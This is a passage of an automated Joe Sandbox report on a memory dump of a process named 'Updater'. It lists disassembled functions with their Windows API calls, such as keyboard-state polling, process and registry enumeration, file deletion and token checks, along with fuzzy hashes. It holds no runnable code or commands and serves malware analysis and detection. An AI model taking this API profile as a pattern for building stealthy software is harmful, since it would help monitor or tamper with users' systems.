Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 536201be3c9f2107125652427824de4ca6e6f794d0098346726a7c844400e562
Instruction ID: ab08f0de1643406727e05aee02671701e8d6c604506dcac291cb592dd8998b09
Opcode Fuzzy Hash: 536201be3c9f2107125652427824de4ca6e6f794d0098346726a7c844400e562
Instruction Fuzzy Hash: 0AE08631B127232B937117176C1C7AA651B9F97B22B064015F906D6220DBD8CC0284A4

Function 006E28D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E28E1
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006E28F3
FreeLibrary.KERNEL32(00000000,?,?,007277B4,?,?,006E058E,?,00000001), ref: 006E2906

Strings

kernel32.dll, xrefs: 006E28DA
Wow64RevertWow64FsRedirection, xrefs: 006E28ED

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 5c2abb36ef1c3cfef1e729042d7d6ae034348b39319c7cf0d669b7318dd12218
Instruction ID: 77bb1dd4fe7ebd9b08a38ad5ba23471c125f5a1f83b508db56ce1ec80c134e58
Opcode Fuzzy Hash: 5c2abb36ef1c3cfef1e729042d7d6ae034348b39319c7cf0d669b7318dd12218
Instruction Fuzzy Hash: B8D0C231B23B6F57863227276C18DCB2A1B9F82B1130A4020FC02A6225DFA8CC11C594

Function 007436AD Relevance: 7.8, APIs: 5, Instructions: 314fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0074396B
DeleteFileW.KERNEL32(?), ref: 007439ED
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00743A03
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00743A14
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00743A26

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ba450aa4bf1078b631cfe6974d864fe45dbbc868ac33352b7a7889c100448b72
Instruction ID: 792f768818427c8bdb3c785f1e2c087609448e71a51322f14bd268c2400e2af0
Opcode Fuzzy Hash: ba450aa4bf1078b631cfe6974d864fe45dbbc868ac33352b7a7889c100448b72
Instruction Fuzzy Hash: ABB130B1E0111DABDF55DFA4CC85EEEB77EEF48350F0040AAF609A6141DB349B448B65

Function 0075AD7F Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0075AE1F
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0075AE2D
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0075AE60
CloseHandle.KERNEL32(?), ref: 0075B035

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 3289d2a72c42e90bd6243963f8baf08914b0319a905cc0c9c38c842393084297
Instruction ID: 11cce4e40bbbc8e17d1ec7415233009ce54dcce9d0575be8cd2e4ef070de752f
Opcode Fuzzy Hash: 3289d2a72c42e90bd6243963f8baf08914b0319a905cc0c9c38c842393084297
Instruction Fuzzy Hash: 43A1D171A00301AFD360DF24C892F2AB7E2AF84710F14891DF9599B3D2DBB5ED448B86

Function 0075B074 Relevance: 7.7, APIs: 5, Instructions: 181processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0075B0A4
Process32FirstW.KERNEL32(00000000,?), ref: 0075B0B2

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 0075B136
Process32NextW.KERNEL32(00000000,?), ref: 0075B19E
CloseHandle.KERNEL32(00000000), ref: 0075B1B0

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 54e999f4c9b69ba9916602573064b9483fbb81d45c483346e51e0fc2e40c46e4
Instruction ID: 6578fdc7258bea2c47f72651cc1008e87cddd4c1890df53b8bf4ce4fd8c09bcb
Opcode Fuzzy Hash: 54e999f4c9b69ba9916602573064b9483fbb81d45c483346e51e0fc2e40c46e4
Instruction Fuzzy Hash: 276151719083019FD750EF24C885AABBBE5FF89750F00492EF98697291EB74D904CB96

Function 0075C3C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C4A5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C500
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0075C563
RegCloseKey.ADVAPI32(?), ref: 0075C5A6
RegCloseKey.ADVAPI32(00000000), ref: 0075C5B3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_wcslen
String ID:
API String ID: 3132563372-0
Opcode ID: f2ce1cf6f5857d9b02f3df6eab89790d3b042c4757096cb9d7d6a17e26ec8bbe
Instruction ID: 804c5bdd999b94bb56952ad8f769f0dbc59189128b69f1bd4155723b69142cba
Opcode Fuzzy Hash: f2ce1cf6f5857d9b02f3df6eab89790d3b042c4757096cb9d7d6a17e26ec8bbe
Instruction Fuzzy Hash: AB61CF31608341AFC315DF64C490F6ABBE5BF84308F14895DF85A8B2A2DB75ED49CB92

Function 007495DA Relevance: 7.6, APIs: 5, Instructions: 144COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0074968D
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007496B9
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00749711
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00749736
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0074973E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: d33a94e3b911e7e1ddedeb3f8fec3f7edf9f83822d12419579e66d67a82ed0a0
Instruction ID: 82e87c8e808348bad2e229dbe66b523a7b341c5e4ba2f8d4647d9d7a415383a2
Opcode Fuzzy Hash: d33a94e3b911e7e1ddedeb3f8fec3f7edf9f83822d12419579e66d67a82ed0a0
Instruction Fuzzy Hash: D4514935A00219EFCB11DF65C891A6ABBF6FF48314F04C099E909AB362CB35ED41CB95

Function 00767526 Relevance: 7.6, APIs: 5, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f63a3fd18dc08ed7f2c3709e9c5c716f4c7f10251cadf9c032fcad113c5305
Instruction ID: 56ab53039ae23304e42d98c215de6fcd6dd37ffee7f5ad59984ad770cecc641c
Opcode Fuzzy Hash: a0f63a3fd18dc08ed7f2c3709e9c5c716f4c7f10251cadf9c032fcad113c5305
Instruction Fuzzy Hash: 05412631A08204AFC728CF2CCC48FA57B65EB09394F1543A5FC1BA72E1C778AD11DA90

Function 006E4B74 Relevance: 7.6, APIs: 5, Instructions: 122keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 006E4B88
ScreenToClient.USER32(00000000,?), ref: 006E4BA5
GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
GetAsyncKeyState.USER32(00000002), ref: 006E4BE8

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: f1c9f47087e34b5bce99e75715fb22ab61daee322668a9d70850ef4a133b1de8
Instruction ID: cbeecb925794d38c1637bcaf461470becc23fb443a3be6ee652a256e6eec6ab0
Opcode Fuzzy Hash: f1c9f47087e34b5bce99e75715fb22ab61daee322668a9d70850ef4a133b1de8
Instruction Fuzzy Hash: 26419431A0621AFFDF159F64C944BEEB775FB08320F208259E429A7290CB396D90CB65

Function 00746291 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000002), ref: 007462C9
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0074634B
GetLastError.KERNEL32(?,00000000), ref: 00746371
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00746396
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007463C2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateFileHardLink$AttributesDeleteErrorLast
String ID:
API String ID: 4077537916-0
Opcode ID: 079776a3a2cbe43f3eb2430f9f4c2ff90990841ab68b4a78d2cf7557c70d1b03
Instruction ID: db5e92bfc0daae6a2142514a53c6f3e185b7a00b822118f3c5391c995b57ab57
Opcode Fuzzy Hash: 079776a3a2cbe43f3eb2430f9f4c2ff90990841ab68b4a78d2cf7557c70d1b03
Instruction Fuzzy Hash: 34417135600620EFCB10DF15C544A5DBBE2FF5A710B158089E95A9B362CB79FE01CB96

Function 00732A1B Relevance: 7.6, APIs: 5, Instructions: 94sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00732A2F
PostMessageW.USER32(00000001,00000201,00000001), ref: 00732ADB
Sleep.KERNEL32(00000000,?,?,?), ref: 00732AE3
PostMessageW.USER32(00000001,00000202,00000000), ref: 00732AF4
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00732AFC

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e0d957bb6241492353ef0e4e84f6267e7ba72840c4a73703052bb6ddf6323024
Instruction ID: c6946a1476e1c64bbea42b6788286239c11564b6dbf4f2cfd53e8cf4a71291d3
Opcode Fuzzy Hash: e0d957bb6241492353ef0e4e84f6267e7ba72840c4a73703052bb6ddf6323024
Instruction Fuzzy Hash: BA31F671A00219EFDB24CFA8CD89ADE7BB5EB04315F108219FD25AB2D2C3B49D51CB90

Function 007514FC Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0075151D
GetForegroundWindow.USER32 ref: 00751534
GetDC.USER32(00000000), ref: 00751570
GetPixel.GDI32(00000000,?,00000003), ref: 0075157C
ReleaseDC.USER32(00000000,00000003), ref: 007515B4

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 319c350f5147e052e920bdac0f42015238a3f58a6f135a18c4404669953f10c4
Instruction ID: c0a3b8040e6350857783fb40b31a5ac0aa320d4351dbdaf59e9c5c8d15a5baa6
Opcode Fuzzy Hash: 319c350f5147e052e920bdac0f42015238a3f58a6f135a18c4404669953f10c4
Instruction Fuzzy Hash: 5521CF35A00214AFD714DF65D888AAEB7E5EF88351B008029F84A87362DB74EC44CB90

Function 0070CBED Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0070CBF6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070CC19

Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070CC3F
_free.LIBCMT ref: 0070CC52
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070CC61

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e7519e41141d910c6b201db2a1353fcfaaa92b4cecf284875870dd8c81f352ca
Instruction ID: 9888778243aeba94090fbdaa8e1fef938e99492436219048221e9548d02ebe05
Opcode Fuzzy Hash: e7519e41141d910c6b201db2a1353fcfaaa92b4cecf284875870dd8c81f352ca
Instruction Fuzzy Hash: AB018D76A01315FFB73617779C8CC7B7AADDEC6B513154319FA09C6281DEA88C0191B4

Function 00702CCF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,007026D1,0070281A,?,?,006DFC79,?,?,006D111E), ref: 00702CD4
_free.LIBCMT ref: 00702D09
_free.LIBCMT ref: 00702D30
SetLastError.KERNEL32(00000000), ref: 00702D3D
SetLastError.KERNEL32(00000000), ref: 00702D46

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: fb23735855556f44b1df2000a060f3963b20b982bd31e5cab3c5ce511b7cddff
Instruction ID: 5bb21a9538a6379767bd5ef4ee35cfea80df7c9e04aaaf23dfd069520ad10f93
Opcode Fuzzy Hash: fb23735855556f44b1df2000a060f3963b20b982bd31e5cab3c5ce511b7cddff
Instruction Fuzzy Hash: 4101D137304701EBD3266639AC8EA5B26E99BD5765B318325F905A22E3FEACCC035024

Function 014A6BE1 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,014A6C78,?,?,00000000), ref: 014A6BF9

Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977

GetThreadLocale.KERNEL32(00000000,00000004,00000000,014A6C78,?,?,00000000), ref: 014A6C29
EnumCalendarInfoA.KERNEL32(Function_0000CB2D,00000000,00000000,00000004), ref: 014A6C34
GetThreadLocale.KERNEL32(00000000,00000003,00000000,014A6C78,?,?,00000000), ref: 014A6C52
EnumCalendarInfoA.KERNEL32(Function_0000CB69,00000000,00000000,00000003), ref: 014A6C5D

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 590b3d91c3d7759a9ebb798f348527814522192c227b05af2d81494be59c1e06
Instruction ID: 0590fa34d9564860ca733152a82e7b57ff49d22ce729cf11635793eca0e06ef0
Opcode Fuzzy Hash: 590b3d91c3d7759a9ebb798f348527814522192c227b05af2d81494be59c1e06
Instruction Fuzzy Hash: 0C017BB4A006057BE201EA72CC11F5A356CEB75710FE7012BF000E62F0EBB49F009160

Function 007310AB Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310C8
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310E3
lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310F1
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 00731101
CLSIDFromString.OLE32(?,?,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 0073110D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 629d424391fa6ac8f1f1a6518bf4b8508973b4735890d5227af8243336981eed
Instruction ID: db9160ab6c013b796e075ee561f4aed709413153cc4d7af177561690faec5f24
Opcode Fuzzy Hash: 629d424391fa6ac8f1f1a6518bf4b8508973b4735890d5227af8243336981eed
Instruction Fuzzy Hash: 3801DF72A11309AFEB204F55CC48BAABBACEB44761F124024FE09D3211E7B9CD409BA0

Function 00732203 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0073221E
GetLastError.KERNEL32(?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 0073222A
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 00732239
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 00732240
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00732257

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: ec1daf907013efe0669aba77e1012c0b72c7d44c5b106fb83dbdd1409d2d3a22
Instruction ID: 1698a4c33334211ddbba4af6da37891cd12a9b0e01dfad4b35451c91b1bc301a
Opcode Fuzzy Hash: ec1daf907013efe0669aba77e1012c0b72c7d44c5b106fb83dbdd1409d2d3a22
Instruction Fuzzy Hash: 6301A2B5600305BFDB214F65DC0896B3B6EFF89360F224054FD45C3321CAB59C018A60

Function 0073211E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00732134
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00732140
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0073214F
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00732156
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0073216C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
